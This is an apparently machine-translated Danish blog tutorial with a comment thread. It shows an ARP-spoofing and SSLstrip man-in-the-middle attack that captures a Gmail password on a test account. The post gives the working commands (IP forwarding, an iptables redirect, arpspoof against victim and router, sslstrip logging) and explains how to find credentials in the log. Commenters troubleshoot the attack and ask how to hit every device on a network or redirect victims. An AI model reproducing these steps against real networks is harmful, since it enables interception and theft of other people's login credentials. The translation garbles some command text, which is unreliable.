Hej bloggere.
I dag har jeg en lille prøve af, hvor farligt det kan være at være forbundet til ethvert usikret netværk af dem, som så mange af os kan lide.
I dag skal jeg bruge ArpSpoofing med Sslstrip til at få en Gmail-adgangskode. For at gøre miljøet mere kontrolleret har jeg oprettet en konto kaldet "testarp@gmail.com".
Og da jeg ikke kan lide præamblerne meget, lad os komme i gang.
MILJØ
Hvad vi har til denne test er følgende:
1. angriber: Det er min stationære eller stationære computer, der har Debian Wheezy. Fra arkiver kan du installere sslstrip y dsniff at få at have harpespoofing
2. Offer: Offeret er en Android-tablet, der kun vil se sin mail gennem browseren.
3. Mediet: Midten er min Cisco DPC2425-router
ADRESSER.
Angriber adresse: 172.26.0.2
Router-adresse: 172.26.0.1
Offerets adresse: 172.26.0.8
Angrebet:
Den første ting, vi vil gøre for dette angreb, er at aktivere forward, så vores computer kan videresende informationen til offeret uden at de er klar over det. (Ellers ville det være et angreb på denial of services)
Til det vil vi bruge:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Hvis vi nu gør hale -f desdelinux vi ser informationen live og direkte
Så hvordan får vi det, vi ønsker?
Lad os først indtaste vores mail på tabletten. Mens vi logger ind, ser vi, at tusinder og tusinder af ting vises på vores konsol.
Nu hvor det er færdigt, lad os åbne vores fil "desdelinux” med nano
nano desdelinux
med Control + W søger vi efter noget, der hedder SIKKER POST.
Og vi vil se noget som dette.
Blandt den enorme linje, der ikke kan ses, er offerets e-mail og adgangskode.
Så vi løber til højre, indtil vi endelig ser lyset ved enden af tunnelen.
Ved en anden lejlighed vil vi se, hvordan vi kan beskytte os lidt mod disse angreb.
hilsen
Jeg benytter lejligheden til at sige, at da indlægget blev offentliggjort, var kommandoerne ikke rigtige.
Kommandoen iptables i slutningen mangler 8080, som er på en anden linje. Og så var arpspoof-kommandoerne alle på samme linje. Hver kommando er på en anden linje.
Forhåbentlig ser redaktøren det og kan ordne det.
Greetings.
Jeg har foretaget de rettelser, du nævner, er det okay?
Hvis du vil indsætte kode i en foretrukken post, skal du bruge HTML-visningen og kontrollere, at artiklen er korrekt, inden du sender den til afventende. Tak skal du have.
Det er koldt at vide, at de af os, der ikke har viden, er så sårbare. Meget god information, selv når jeg forstår lidt af emnet, indser jeg vigtigheden. Tak skal du have!
hilsen
Men det fungerer kun, hvis angriberen og offeret er på samme netværk. Under alle omstændigheder ser det ud til, at hvis du (ved at være på det samme netværk) opretter du forbindelse via HTTPS, sker det ikke, fordi dataene er krypteret, FØR du forlader din maskine. Hvis du opretter forbindelse via HTTP (uden S), tror jeg, at selv når du ser på netværkskablet, ser du nøglerne.
Det er ikke sandt. Jeg hacker en gmail-adgangskode, og hvis du bemærker, bruger gmail https. Så? Pointen er, at selvom https er sikker, afhænger det af http. Så det er ikke så sikkert.
Tilstå ikke så meget om en https, at S ikke er for Superman, det er for "sikkert"
det fungerer med eller uden https, jeg har prøvet det med en mere specialiseret Linux distro, og det fungerer uden problemer
Du kan præcist bruge det til at lære dem, der stjæler dit Wi-Fi, en lektion. 😀
Det ligner mere eller mindre, hvad de sagde for længe siden på Chema Alonsos blog:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, det er fantastisk! / Og så fortæller de min paranoide hver gang jeg bruger VPN, når de går for at kontrollere bankkontoen ...) Forresten skal du se, hvor kyniske mennesker er i kommentarerne ... hvis det til sidst stjæler ...
Nu skal vi tage en tutorial om, hvordan du opretter og tilbyder din egen VPN-tjeneste.
Historien, som du linker til, er meget interessant, den virker endda værdig til en romanbog, og det får mig til at huske, da jeg brugte mine naboers internet, og selvom jeg siger, at jeg kender emnet, tror jeg, jeg aldrig kunne se de sande dimensioner faren for at jeg kunne have holdt, heldigvis for mig, ændrede de kun adgangskoden til WPA2, og det var her min historie med internetudbyderen begyndte haha
Derfor siger titlen Sslstrip i aktion.
Det fungerer, så længe angriberen er i midten
Hvilken bølge arbejder du med prisme? -.-
no.
Hvad venter du på at sende din anmodning XD
hensyn
godt indlæg
Interessant, jeg laver en pædagogisk test senere ... Måske kunne jeg endda fjerne adgangskoden til WiFi og have det sjovt lidt 😛
Kan du med en chance gøre noget lignende for at sende forskellige sider til dem, det mål, du har anmodet om? For eksempel vil de åbne Facebook, og jeg omdirigerer dem til Google? 😛
Ja. Men det hele er en meget anden rulle.
Måske sender jeg det senere.
meget godt indlæg, disse emner er meget lærerige, nu skal vi være i stand til at imødegå dette angreb, da nogle (som mig) opretter forbindelse til offentlige netværk (f.eks. universitetet) ville det være nyttigt at undgå det.
Greetings!
Det fungerede ikke for mig 🙁
Noget fejler mig her, bortset fra at https-forbindelser er krypteret via et servercertifikat (når du har certifikatet på din maskine, er din browser ansvarlig for krypteringen) med iptables omdirigerer du port 80 (http) , ikke 443, hvilket er https
Det troede jeg også. Pointen er, at selvom https er "sikker", afhænger det desværre af http. Så sslstrip drager fordel af det, det får browseren til at tro, at det bruger https-legitimationsoplysninger, men det er det ikke.
hellig lort! men browseren skal se en advarsel som "dette certifikat kommer fra et mistænkeligt websted eller noget lignende" ... Jeg bliver bestemt nødt til at lave test XD
Nej, absolut intet kommer ud.
Det fungerede endelig for mig
Jeg har forbindelse til et WEP-netværk med adgangskode, og det viste mig adgangskoden direkte alligevel.
En forespørgsel. Kan du udføre den samme procedure, men for alle de computere, der er forbundet i netværket, i stedet for at have et enkelt offer?
Ja du kan. Men jeg har ikke gjort eksperimenter. Prøv det selv og fortæl os, hvordan det går.
Det eneste jeg får med dette er, at offerets maskine går offline, men sslstripen viser mig ikke noget: /
Du skal deaktivere firewallen et øjeblik. Eller i det mindste aktivere indgående forbindelser.
Probe og jeg kunne kun se brugernavnet og adgangskoden på facebooksiden, i gmail fandt jeg ikke noget resultat i loggen, og jeg havde kun brug for en linje med arpspoof «arpspoof -i -t«. På den anden side kunne offermaskinen ikke åbne nogle sider. Jeg vil fortsætte med at undersøge, det er meget interessant. En hjælp til dem, der bruger Manjaro, pakkerne, der skal installeres, er: dsniff (her er arpspoff), snoet og python2-pyopenssl. Sslstrip kan downloades herfra: http://www.thoughtcrime.org/software/sslstrip/
For at køre det $ python2 sslstrip.py
Greetings.
Det kom ikke ud, men arpspoof-linjen er: #arpspoof -i int -t ip-victim ip-router
se jeg gør nøjagtigt hvad du siger:
ekko "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Problemet er, at offeret, som er en anden pc, som jeg har her på mit værelse, efterlades uden forbindelse til det punkt, at jeg skal genstarte routeren, hvad kan jeg gøre, hjælp mig.
En anden ting, jeg arbejder med en virtuel maskine, og når jeg udfører iwconfig-kommandoen, vises wlan0 ikke, heller ikke når jeg udfører ifconfig, men hvis jeg har internet på min virtuelle maskine, hvad med en eth0-grænseflade.